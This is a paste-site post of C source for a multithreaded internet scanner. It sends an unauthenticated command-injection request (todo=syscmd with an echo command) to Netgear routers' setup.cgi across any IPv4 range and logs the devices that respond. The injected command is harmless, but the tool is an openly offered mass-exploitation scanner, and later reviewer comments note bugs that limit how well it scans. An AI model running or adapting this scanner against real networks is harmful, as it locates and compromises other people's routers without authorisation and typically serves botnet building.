KhaosBringer

Netgear RCE Scanner

Mar 26th, 2019
  1. /* Netgear unauthenticated command execution scanner */
  2.  
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <pthread.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
  13.  
#define BUFSIZE 4096 /* size of each worker's request and response buffer */

/* Scan configuration: written once by main() before the workers start, then read-only. */
int timeout;                                    /* connect timeout in seconds, handed to select() */
char *log_file;                                 /* path appended to with one address per hit */
unsigned long start_ip, end_ip, ips_per_thread; /* host-order IPv4 range bounds and the per-thread slice width */
/* Counters shared between the workers and main()'s progress loop.
 * NOTE(review): volatile does not make ++/-- atomic; concurrent updates from
 * several workers can be lost. An atomic type would be the correct choice. */
volatile int vuln_found, running_threads, ips_scanned;
pthread_mutex_t file_mutex = PTHREAD_MUTEX_INITIALIZER; /* serialises the open/append/close on log_file */
  21.  
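/*
 * SIGINT handler: end the scan immediately.
 *
 * Only async-signal-safe calls are used here. The original fprintf()/exit()
 * pair is not: main() and the workers hold stdio locks while printing and
 * appending to the log, and exit() runs atexit handlers and flushes stdio,
 * so a SIGINT arriving mid-print could deadlock instead of terminating.
 * write(2) and _exit(2) are safe to call from a handler.
 *
 * sig: the signal number (unused, always SIGINT as installed by main()).
 */
void sighandler(int sig)
{
    (void)sig;
    /* Terminate the "\r..." progress line so the shell prompt starts on a fresh line. */
    if (write(STDOUT_FILENO, "\n", 1) < 0) {
        /* Nothing sensible to do while dying; the exit below still happens. */
    }
    _exit(EXIT_SUCCESS);
}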
  27.  
/*
 * Worker thread body. Walks this thread's slice of the address range,
 * connects to each host on TCP/80 with a bounded connect timeout, sends the
 * setup.cgi "syscmd" request and appends the host's address to log_file
 * when the response contains the marker string the injected echo produces.
 *
 * id: the thread index, passed through the void* by main() and cast back
 *     here. Thread k owns [start_ip + k*ips_per_thread, start_ip + (k+1)*ips_per_thread);
 *     a thread whose upper bound reaches end_ip scans through end_ip inclusive
 *     instead (see the loop condition).
 *
 * Side effects: bumps the shared running_threads / ips_scanned / vuln_found
 * counters and appends to log_file under file_mutex.
 *
 * Return: declared void* but never yields a value -- it falls off the end, or
 * bare-returns on socket() failure. pthread_join()'s result is unused in main().
 */
void *dongs(void *id)
{
    /* Plain ++ on a volatile int is not atomic; when several workers start at
     * once an increment can be lost, which can let main()'s
     * running_threads > 0 wait loop end before every worker has finished. */
    running_threads++;

    int thread_id = (int)id; /* pointer-to-int narrowing; fine for small indices, but warns on LP64 */
    char ipbuff[16], sendbuff[BUFSIZE], recvbuff[BUFSIZE];
    /* Half-open slice [s_ip, e_ip) for this thread; see the loop condition below. */
    unsigned long current_ip, s_ip = start_ip + ips_per_thread * thread_id, e_ip = start_ip + ips_per_thread * (thread_id + 1);

    int s;
    fd_set selset;
    struct timeval tv;
    struct sockaddr_in si_other;

    /* NOTE(review): a single socket is created for the whole loop. A TCP
     * socket that has been connect()ed, or whose connect attempt failed,
     * cannot be connect()ed again, so only the first address of each slice
     * gets a real probe; every later iteration fails at connect()/SO_ERROR. */
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        /* NOTE(review): bare `return;` from a void* function, and
         * running_threads was incremented above without a matching decrement,
         * so main() would spin in its wait loop forever. */
        return;
    }

    /* Runs to e_ip exclusive, except that a thread whose e_ip is at or past
     * end_ip runs to end_ip inclusive. If the rounding in ips_per_thread makes
     * every e_ip fall short of end_ip, the tail of the range is never scanned. */
    for (current_ip = s_ip; (e_ip >= end_ip && current_ip <= end_ip) || current_ip < e_ip; current_ip++) {
        fcntl(s, F_SETFL, fcntl(s, F_GETFL, NULL) | O_NONBLOCK); // non-blocking so connect() returns at once and select() enforces the timeout

        memset(&si_other, '\0', sizeof(si_other));
        si_other.sin_family = AF_INET;
        si_other.sin_port = htons(80);
        si_other.sin_addr.s_addr = htonl(current_ip);

        tv.tv_sec = timeout; /* select() may modify tv, so it is reset every iteration */
        tv.tv_usec = 0;

        FD_ZERO(&selset);
        FD_SET(s, &selset);

        /* Dotted-quad for the Host header and the log line. NOTE(review): the
         * arguments are unsigned long but the conversions are %d (format
         * mismatch, technically undefined); the values fit in an int, so it
         * works in practice. %lu would be the matching conversion. */
        snprintf(ipbuff, sizeof(ipbuff), "%d.%d.%d.%d", (current_ip & 0xFF000000) >> 24, (current_ip & 0x00FF0000) >> 16, (current_ip & 0x0000FF00) >> 8, current_ip & 0x000000FF);
        /* The marker string is also part of the request URL, so any server that
         * reflects the requested path in its response (a 404 page, for instance)
         * matches the strstr() below and is logged as a false positive. The
         * request is HTTP/1.1 without a Connection: close header, so a keep-alive
         * server may leave the connection open after answering. */
        snprintf(sendbuff, sizeof(sendbuff), "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo lolimgay&curpath=/&currentsetting.htm=1 HTTP/1.1\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\n\r\n", ipbuff);

        /* Return value ignored: on a non-blocking socket EINPROGRESS is the
         * normal outcome; the real result is read back via SO_ERROR below. */
        connect(s, (struct sockaddr *)&si_other, sizeof(si_other));

        /* Wait up to `timeout` seconds for the socket to become writable. */
        if (select(s + 1, NULL, &selset, NULL, &tv) > 0) {
            int n, valopt;
            socklen_t len = sizeof(int);
            /* Return value unchecked: if getsockopt() itself fails, valopt is read uninitialised below. */
            getsockopt(s, SOL_SOCKET, SO_ERROR, &valopt, &len);

            if (valopt == 0) { /* the connect completed without error */
                fcntl(s, F_SETFL, fcntl(s, F_GETFL, NULL) & ~O_NONBLOCK); // back to blocking for the request/response exchange
                write(s, sendbuff, strlen(sendbuff)); // write the payload; a short write or error is not checked

                /* Blocking reads with no receive timeout: a host that accepts
                 * the connection but never answers, or never closes, keeps this
                 * thread stuck here. Each chunk is checked on its own, so a
                 * marker split across two reads is missed. */
                while ((n = read(s, recvbuff, BUFSIZE - 1)) > 0) {
                    recvbuff[n] = '\0';
                    if (strstr(recvbuff, "lolimgay")) {
                        vuln_found++; /* same non-atomic ++ caveat as running_threads */
                        pthread_mutex_lock(&file_mutex);
                        FILE *fp;
                        if (fp = fopen(log_file, "a")) { /* open/append/close per hit; an open failure drops the hit silently */
                            fprintf(fp, "%s\n", ipbuff);
                            fclose(fp);
                        }
                        pthread_mutex_unlock(&file_mutex);
                        break; /* leaves the read loop only; the connection is not shut down here */
                    }
                }
            }
        }

        ips_scanned++; /* shared counter, same non-atomic caveat */
    }

    close(s);
    running_threads--;
}
  96.  
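/*
 * Parse a decimal integer argument, rejecting junk, overflow and values
 * outside [lo, hi]. Prints a diagnostic and exits on a bad value, so the
 * caller never works with a garbage number (atoi() would silently yield 0,
 * which for the thread count meant a zero-length VLA and a division by zero).
 */
static long parse_long_arg(const char *s, long lo, long hi, const char *what)
{
    char *end = NULL;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < lo || v > hi) {
        fprintf(stderr, "Invalid %s: '%s'\n", what, s);
        exit(EXIT_FAILURE);
    }
    return v;
}

/*
 * Parse a dotted-quad IPv4 address and return it in host byte order.
 * Goes through a struct in_addr so only the 32 bits inet_pton() wrote are
 * converted; the original wrote into an 8-byte unsigned long and relied on
 * ntohl() truncating, which only happens to work on little-endian hosts.
 * Exits with a diagnostic on a malformed address (the original ignored
 * inet_pton()'s return and scanned from whatever was in the global).
 */
static unsigned long parse_ipv4_arg(const char *s, const char *what)
{
    struct in_addr addr;
    if (inet_pton(AF_INET, s, &addr) != 1) {
        fprintf(stderr, "Invalid %s: '%s'\n", what, s);
        exit(EXIT_FAILURE);
    }
    return ntohl(addr.s_addr);
}

/*
 * Entry point. Validates the command line, fills in the shared configuration
 * globals, starts the worker threads and prints a one-line progress counter
 * once a second until every worker has exited.
 *
 * argv: <ip range start> <ip range end> <log file> <threads> <timeout>
 *   range start/end - dotted-quad IPv4 addresses; start must not exceed end
 *   log file        - path the workers append matching addresses to
 *   threads         - worker thread count, must be >= 1
 *   timeout         - connect timeout in seconds, must be >= 0
 *
 * Exits EXIT_FAILURE on a usage or argument error, EXIT_SUCCESS otherwise.
 */
int main(int argc, char **argv)
{
    if (argc < 6) {
        fprintf(stderr, "Usage: %s <ip range start> <ip range end> <log file> <threads> <timeout>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    signal(SIGINT, sighandler);
    signal(SIGPIPE, SIG_IGN); /* a peer closing mid-write must return EPIPE, not kill the process */

    log_file = argv[3];
    timeout = (int)parse_long_arg(argv[5], 0, INT_MAX, "timeout");
    int threadc = (int)parse_long_arg(argv[4], 1, INT_MAX, "thread count");

    start_ip = parse_ipv4_arg(argv[1], "range start");
    end_ip = parse_ipv4_arg(argv[2], "range end");
    if (end_ip < start_ip) {
        fprintf(stderr, "Range end %s is below range start %s\n", argv[2], argv[1]);
        exit(EXIT_FAILURE);
    }

    /* Round-to-nearest split of the range across the workers (threadc >= 1
     * here, so the division is safe). Rounding down can leave a tail below
     * end_ip that no worker covers; rounding up makes the last worker stop at
     * end_ip. */
    ips_per_thread = (end_ip - start_ip + threadc / 2) / threadc;
    unsigned long toscan = end_ip - start_ip;

    /* Heap rather than a VLA: an arbitrarily large thread count must not blow the stack. */
    pthread_t *threads = calloc((size_t)threadc, sizeof *threads);
    if (threads == NULL) {
        perror("calloc");
        exit(EXIT_FAILURE);
    }

    fprintf(stdout, "Starting Scanner...\n");

    int i;
    for (i = 0; i < threadc; i++) {
        /* The worker expects its index smuggled through the void* argument. */
        if (pthread_create(&threads[i], NULL, dongs, (void *)(intptr_t)i) != 0) {
            perror("pthread_create");
            exit(EXIT_FAILURE);
        }
    }

    fprintf(stdout, "Found\tLeft\tThreads\n");

    /* NOTE(review): running_threads is incremented by the workers themselves,
     * so this loop can observe 0 before any worker has run and fall straight
     * through to the joins (which then wait correctly, but without progress
     * output). Also, the inclusive end means ips_scanned can exceed toscan by
     * one, at which point the unsigned "Left" column wraps. */
    while (running_threads > 0) {
        fprintf(stdout, "\r%d\t%lu\t%d", vuln_found, toscan - ips_scanned, running_threads);
        fflush(stdout);
        sleep(1);
    }

    for (i = 0; i < threadc; i++) { /* reclaim thread resources */
        pthread_join(threads[i], NULL);
    }
    free(threads);

    pthread_mutex_destroy(&file_mutex);
    fprintf(stdout, "\n");
    exit(EXIT_SUCCESS);
}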